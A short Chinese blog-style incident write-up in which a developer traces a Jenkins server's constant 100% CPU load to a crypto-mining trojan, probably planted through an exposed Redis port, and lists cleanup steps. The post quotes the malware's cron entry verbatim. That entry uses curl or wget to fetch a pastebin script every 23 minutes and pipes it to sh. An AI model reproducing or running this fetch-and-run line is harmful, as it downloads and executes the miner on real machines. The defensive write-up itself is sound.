起因:前几天,开发服务器的Jenkins服务一直会出现偶然性的失败,编译代码的线程经常性被kill掉,需要启动好几次才有机会成功。给开发带来诸多不便。受不了啦,于是在一个午饭时间,决定要彻底搞清楚这个问题。
解决问题
首先使用top命令,查看cpu占用。不看不知道啊,看了吓一跳!cpu占用一直在98-100%之间,但是却看不到占用大量内存的进程,此时感觉到问题应该是被木马入侵了。
于是crontab-l看了一下,果然有一个没见过的定时任务。
*/23 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh
凭直觉,在搜索了下1NtRkBc3,果不其然,我并不是天选之子啊。赶紧看看前人的处理方式,总结如下:
1.删除掉上面的定时任务
2.删除掉以下文件
/etc/cron*
/var/spool/cron/root
/usr/local/lib/libdns.so
/etc/ld.so.preload
/bin/dns
/usr/sbin/netdns
/etc/init.d/netdns( /etc/rc.d/init.d/netdns)
/tmp目录下的陌生文件
3.再使用top命令,找到占用大量进程的进程,并kill掉
注:删文件之前,保险起见可以先做一下备份,避免出现误删
一定要将文件都删除赶紧之后再删除进程,因为进程有做相互唤醒,先除根再扫叶
本次出现被挖矿木马植入的原因,应该是前段时间redis的端口有对外网放开过,大家一定要记得redis端口仅内外访问或者做加固,不然费力有费心,还费电!